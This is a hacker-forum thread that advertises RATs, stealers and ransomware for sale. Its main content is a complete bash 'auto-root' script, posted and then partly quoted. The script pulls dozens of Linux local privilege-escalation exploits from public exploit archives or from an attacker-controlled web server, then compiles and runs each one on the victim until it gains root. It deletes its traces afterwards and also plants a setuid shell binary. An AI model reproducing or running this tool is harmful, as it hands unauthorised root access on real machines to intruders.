Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      D4rkn3S

      linux privilege escalation commands

      By D4rkn3S, in Pentesting

      Recommended Posts

      D4rkn3S    856

      D4rkn3S
      Posted

      hello guys, there is commands and cheat sheet which need at privilege escalation phase

       

      Hidden Content

        Give reaction to this post to see the hidden content.

      Share this post

      Link to post
      Share on other sites

      zhanghuhu    0

      zhanghuhu
      Posted

      i am really looking for these command hope u are going to proivide private commands 

      Share this post

      Link to post
      Share on other sites

      bash818    230

      bash818
      Posted

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      Share this post

      Link to post
      Share on other sites

      D4rkn3S    856

      D4rkn3S
      Posted
      23 hours ago, bash818 said:

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

      Spoiler

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Share this post

      Link to post
      Share on other sites

      bash818    230

      bash818
      Posted (edited)
      hace 8 horas, D4rkn3S dijo:

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

        Reveal hidden contents

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

